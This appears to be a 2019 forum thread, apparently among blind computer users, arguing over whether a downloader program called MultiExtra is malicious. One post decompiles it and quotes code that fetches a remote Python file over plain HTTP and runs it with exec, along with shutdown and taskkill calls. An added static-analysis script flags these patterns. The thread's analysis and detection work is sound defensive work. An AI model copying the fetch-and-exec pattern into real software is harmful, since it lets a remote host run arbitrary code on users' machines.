2019-05-20 14:39:41

And another thing that I don't understand is that Baby, the user on the forum, has made a tutorial about it and he doesn't have any problems. Also someone else has no problems.

Let's make this forum again a place where there won't be any drama.

2019-05-20 14:40:10

I will try it.

Let's make this forum again a place where there won't be any drama.

2019-05-20 14:50:29 (edited by yousuf 2019-05-20 14:52:59)

hi.
@giorgi, yeah, his acapela tts forced me to take my computer to a person to format it.
my computer was working in windows xp.
one day, when I published on the arabic forums about him and his viruses, he called me, along with hamad alqasar and others, and said to me: if you don't want to reedit your post, saying that I'm not a hacker and a virus maker, I'll hack your computer using kali linux.
at that time, I was forced to edit my post because you know guys, windows xp is unsupported by microsoft and can be hacked easily.
@alireza, you're right.

Thumbs up

2019-05-20 14:51:48

OK, good luck. But if your computer acts strangely, if files get renamed, if your Skype becomes compromised, if the add-on breaks your SAPI because of its convoluted installation scripts, that's on you. We've warned you what could happen, and if things do get broken it is *your* fault.

The Beast continued its studies with renewed Focus, building great Reference works and contemplating new Realities. The Beast brought forth its followers and acolytes to create a renewed smaller form of itself and, through Mischievous means, sent it out across the world.
from The Book of Mozilla, 6:27

Thumbs up

2019-05-20 14:58:16 (edited by Jod 2019-05-20 14:59:32)

@urh that's the thing you won't know what he is doing, he's gonna do it silently. @yousuf hamad alkasar the same person who cloned CM too? i'd ignore the hack threats if i were you if you are secure they can't do shit.
@urh i didn't get hacked by him because i was sane and took the warnings seriously, but my friend got hacked by his addon.
@
hey ahmad star or whoever you are, try your best to hack me. i'm waiting for you to hack me.

2019-05-20 15:01:05

hi.
@alireza, exactly he's the same person.
that time was in 2015, I wasn't having any antivirus.

Thumbs up

2019-05-20 15:22:58

Ahmed was on SBYW 15 minutes ago. I've asked him to tell me his surname but he didn't reply. Also, I will not use an addon, it's an exe file like a program. And one more time, Baby, the user on this forum has tested it.

Let's make this forum again a place where there won't be any drama.

2019-05-20 15:27:35

his surname is sattar.

Yours kindly

Thumbs up

2019-05-20 15:38:04

EXE? even more dangerous. and even if you give 69 billion people to test it i'll still not trust that guy and his products.

2019-05-20 16:09:55

I think the big deal here is that when people talk about stealing files, what they mean is copying without your permission.

If someone breaks into your house and steals your microwave or television, you know immediately because you don't have it any more. If someone breaks into your computer and steals your files, they generally don't want you to know, so they won't delete them from your system. So you get to keep your files and go on thinking nothing is wrong, while the bad guys also have your files and, depending on what types of files they are, can do all sorts of undesirable things, usually not involving any changes whatsoever to the way your computer functions. So you go on thinking nothing's wrong, until one day someone else releases a program using some of your source code. Or someone steals your identity using financial records stolen from your computer. Or any number of other things.

Thumbs up +3

2019-05-20 16:30:42 (edited by Ethin 2019-05-20 16:43:06)

OK, OK. Everyone cool it. As we speak I am sandboxing the program and am going to post my findings once I have unpacked the setup files and can get access to the actual executable (the setup itself is not harmful, according to virus total). Analyzing the installed program in my sandbox, I notice many things off of the bat, one of which is notable -- this program is written in Python! Python 3.6, to be precise. Extracting the setup file ("installing" it in my sandbox) and extracting the .exe file, I see the pyinstaller archive files, and now I have the compiled python bytecode. At this stage decompilation is trivial: I see that the app has the standard python stdlib, chardot, and this file called... MEX.pyc. Mmm... and what could this be?
Oh dear! Some suspicious code! Looky, friends:

import glob, wx, urllib.request, re, sys, webbrowser, threading, subprocess, os, locale, win32clipboard, pyperclip, datetime, time, ctypes, gettext
from html2text import html2text
from playsound import playsound
import encodings.idna
get = os.environ['temp']
item = urllib.request.urlretrieve('http://softjewel.droppages.com/MultiExtra/Data/MAX.py', 'MAX.py')
exec(open('MAX.py').read())

Looking at this "max.py" file...
First, it imports its "needed" modules. Then... there's this exception handler that gets it to try to remove itself from the file system. Should that fail, it does nothing.
Next, it tries to change to c:\ProgramData\MultiExtra. Not sure how that'll work since the app doesn't create it (maybe the setup does?). It then creates an appdata folder and creates its multiextra.ini file.
The worrying thing however is how many downloads this thing does. There's another download on line 92 (the rest of the above discussion is just it doing its normal configuration) that it reads from using the URL http://softjewel.droppages.com/MultiExtra/Data/MAX.txt. (Note the lack of 'https'.) This file... doesn't seem to contain anything, if I browse to it. It also links to NVDA as well. (Note that this is the "actual" NVDA file, and is not malicious -- just version 2018.1.1, but it replaces that with the latest version on softpedia for some reason.)
We're not done though! This program also seems to do some very disturbing subprocess calls. In particular:
Line 474: subprocess.Popen("taskkill /f /pid {pid} /t".format(pid=self.process.pid), startupinfo=info)
It also runs command prompt:
Line 560: subprocess.Popen("cmd.exe /c pushd " + self.DPath + " & start MultiExtraDownloads\Apps", startupinfo=info)
And this...
Line 562: subprocess.Popen("shutdown.exe -s -t 0", startupinfo=info)
And, of course, the end of the application, when it tries to taskkill itself instead of exiting properly:
Line 2,195: subprocess.Popen("taskkill /f /im MultiExtra.exe", startupinfo=info, shell=True)
Some things to note with these subprocess calls:
* Line 474: subprocess.Popen("taskkill /f /pid {pid} /t".format(pid=self.process.pid), startupinfo=info): This one isn't harmful -- unless, of course, he sets it to something like csrss's PID or another critical system process if he's able to gain that level of privilege.
* Line 560: subprocess.Popen("cmd.exe /c pushd " + self.DPath + " & start MultiExtraDownloads\Apps", startupinfo=info): this one is... entirely unnecessary and pointless. I don't get it. I don't really get what it's trying to do (I think "MultiExtraDownloads\Apps" is some kind of executable or batch script or something like that).
* Line 562: subprocess.Popen("shutdown.exe -s -t 0", startupinfo=info): -s shuts down the computer, only; -t (/t) tells it to do an immediate shutdown.
There are also some other os.remove calls that are in here. I'd be happy to fully decompile all the code and upload it somewhere for people like cartertemm to go over and review.
As for the "this program steals files" accusation, I'm checking on that.
OK, I can't confirm that either way. It doesn't use shutil or networking -- that I can see anyway, other than urllib. It doesn't use shutil so it can't do any bulk copies, and it doesn't use os.rename, os.renames, or os.link/os.unlink, nor does it contact any remote servers via obscure protocols. Not that I can find, at any rate. So I think that for now we can discard that accusation (though don't bank on that, I didn't decompile the entire program tree).
In sum: the program does some disturbing activity which I'd like others to take up (I'm not going to read the entire program). On the surface it is *not* harmful. I repeat: it is *not* harmful on the surface. However, I would hold off accusations and destructive comments until people like cartertemm (and even myself if I decide to dive into that mess of code) can fully analyze it. In the meantime, I would hold off on using it lest you get hit by something we have not found.

"On two occasions I have been asked [by members of Parliament!]: 'Pray, Mr. Babbage, if you put into the machine wrong figures, will the right answers come out ?' I am not able rightly to apprehend the kind of confusion of ideas that could provoke such a question."    — Charles Babbage.
My Github

Thumbs up +5
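
A static triage pass over decompiled source like the snippet quoted in the post above, written as an added example (not code from the thread or from the program under analysis): it parses the text with Python's `ast` module, never runs it, and flags a download followed by `exec` of the downloaded file along with the subprocess calls discussed. The sample input is constructed, the host is a placeholder, and `triage`, the finding labels and the command watch list are assumptions of this sketch.

```python
import ast

# Constructed sample modelled on the snippet quoted in the post above; the host
# is a placeholder and nothing here is fetched or executed, only parsed.
SAMPLE = '''
import urllib.request, subprocess
item = urllib.request.urlretrieve('http://updates.example.invalid/Data/MAX.py', 'MAX.py')
exec(open('MAX.py').read())
subprocess.Popen("shutdown.exe -s -t 0")
subprocess.Popen("taskkill /f /im MultiExtra.exe", shell=True)
'''

FETCHERS = {"urlretrieve", "urlopen"}
LAUNCHERS = {"Popen", "run", "call", "check_output", "system"}
RISKY_COMMANDS = ("shutdown", "taskkill", "cmd.exe")   # assumed watch list

def call_name(call):
    """Last component of the called name: urllib.request.urlretrieve -> urlretrieve."""
    func = call.func
    return func.attr if isinstance(func, ast.Attribute) else getattr(func, "id", "")

def literal_strings(node):
    """Every string literal that appears anywhere inside the node."""
    return [n.value for n in ast.walk(node)
            if isinstance(n, ast.Constant) and isinstance(n.value, str)]

def triage(source):
    """Return (line, kind, detail) findings for source text, without running it."""
    findings, downloaded = [], set()
    calls = [n for n in ast.walk(ast.parse(source)) if isinstance(n, ast.Call)]
    for call in sorted(calls, key=lambda c: (c.lineno, c.col_offset)):
        name, strings = call_name(call), literal_strings(call)
        if name in FETCHERS and strings:
            downloaded.update(strings[1:])          # local file names written to
            kind = "fetch-plain-http" if strings[0].startswith("http://") else "fetch"
            findings.append((call.lineno, kind, strings[0]))
        elif name in ("exec", "eval"):
            hits = [s for s in strings if s in downloaded]
            kind = "exec-of-downloaded-file" if hits else "dynamic-exec"
            findings.append((call.lineno, kind, hits[0] if hits else ""))
        elif name in LAUNCHERS:
            command = " ".join(strings)
            if any(word in command.lower() for word in RISKY_COMMANDS):
                findings.append((call.lineno, "risky-subprocess", command))
    return findings

if __name__ == "__main__":
    for line, kind, detail in triage(SAMPLE):
        print(f"line {line}: {kind}: {detail}")
```

A clean result from a pass like this only means none of these patterns appear in the file that was scanned; it says nothing about what a remotely hosted script contains on a later run.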

2019-05-20 16:45:23

Oh wow, seems pretty harmful. I would never trust such a dev with such past deeds and a program with such strange process calls as shutdown /t0. Who doesn't believe the guys that are saying the program is harmful, well, it's sure your choice and all that, but well, they warned you. In your place I'd never download such a program.

Thumbs up

2019-05-20 16:52:40 (edited by Ethin 2019-05-20 16:53:04)

@37, the shutdown call may be linked to an option that allows you to shutdown a computer after it's done doing something. That's not the first time I've seen something like that in an app; DSpeech has something like that as well and people used to (and probably still do) use it all the time. However, I don't truly know so am being cautious.

"On two occasions I have been asked [by members of Parliament!]: 'Pray, Mr. Babbage, if you put into the machine wrong figures, will the right answers come out ?' I am not able rightly to apprehend the kind of confusion of ideas that could provoke such a question."    — Charles Babbage.
My Github

Thumbs up

2019-05-20 17:50:49

The thing is, it doesn't matter if MAX.py is the most harmless program ever made right now. Fact is, it could become devastatingly harmful, because it's downloading from an external source, I presume every time you open the app. Do not trust this program.

Thumbs up +1

2019-05-20 17:54:34

Blind Extra did something similar I believe. It downloaded then executed some Python file that could do just about anything...

The Beast continued its studies with renewed Focus, building great Reference works and contemplating new Realities. The Beast brought forth its followers and acolytes to create a renewed smaller form of itself and, through Mischievous means, sent it out across the world.
from The Book of Mozilla, 6:27

Thumbs up

2019-05-20 18:40:56

And when you're downloading code and the code is harmless at first, perhaps it could be changed at a later date to become malicious, I would definitely recommend against using this program.

Also, if your computer acted strangely immediately after you got a virus, then you'd be doing something about it. That's not smart design on the virus writer's point. What they want to do instead is make you think everything is OK while they plunder your system. Viruses often also have a dormancy period for the very reason that if it starts working right away, the person is going to connect the dots back to the last thing they downloaded (your app), rather than letting it wait a while which throws things into question.

Facts with Tom MacDonald, Adam Calhoun, and Dax
End racism
End division
Become united

2019-05-20 18:55:39

39-41, exactly why I recommended people don't use it until we can examine it further. The fact that it immediately downloads code when you run it is incredibly suspicious and brings into question what the developer is trying to do. All three of you are correct in saying that, since the code is hosted on a server it could be changed. The fact that it calls exec and not some kind of sanitized eval (I don't get why you'd use eval or exec, period; it's dangerous) makes it a threat. The code can do literally anything it likes so long as it's valid syntax.

"On two occasions I have been asked [by members of Parliament!]: 'Pray, Mr. Babbage, if you put into the machine wrong figures, will the right answers come out ?' I am not able rightly to apprehend the kind of confusion of ideas that could provoke such a question."    — Charles Babbage.
My Github

Thumbs up +3

2019-05-21 05:28:40

Actually, I never use the software since this developer released Blind extra.

@Ethin, thank you for your clarification about the code. If some of these people don't believe us, let them be hacked. It's their own responsibility.

2019-05-21 05:35:54

@43, I did what I could, though I could've done better. I think I got my point across pretty nicely with what I did though.

"On two occasions I have been asked [by members of Parliament!]: 'Pray, Mr. Babbage, if you put into the machine wrong figures, will the right answers come out ?' I am not able rightly to apprehend the kind of confusion of ideas that could provoke such a question."    — Charles Babbage.
My Github

Thumbs up

2019-05-21 05:51:34

I don't even get the appeal of this thing. There are a billion virus-free ways to download Youtube videos. Even if you're just in it for the cracked software it contains, surely there are better ways, relatively speaking, of obtaining that, if you really want it. Even if the code were clean, there wouldn't be any reason for me to go near this thing, and I don't get why so many people are defending it.

The glass is neither half empty nor half full. It's just holding half the amount it can potentially hold.

Thumbs up

2019-05-21 16:14:37

Oh my god, do I really need to say that again: Baby has made a review of it. And I have an idea, I have an old computer that I no longer use so I will try to install it on my old computer and I will see what happens.

Let's make this forum again a place where there won't be any drama.

2019-05-21 16:38:09

Urh wrote:

Oh my god, do I really need to say that again: Baby has made a review of it. And I have an idea, I have an old computer that I no longer use so I will try to install it on my old computer and I will see what happens.

oh my god, do I need to ask this again. What is really new and original about this thing?

A bus station is where a bus stops. A train station is where a train stops. On my desk, I have a work station…

Thumbs up

2019-05-21 16:40:42

Urh wrote:

Oh my god, do I really need to say that again: Baby has made a review of it. And I have an idea, I have an old computer that I no longer use so I will try to install it on my old computer and I will see what happens.

I give up. If you're okay with the author being able to see what porn you watch or whatever, then I guess that's your choice...

Thumbs up

2019-05-21 16:44:21

WTF? You don't have proof that it is hacked.

Let's make this forum again a place where there won't be any drama.

2019-05-21 16:46:42

@49, look at the post 36, and reconsider your words. If it still doesn't convince you enough, well then i have nothing to say.

Thumbs up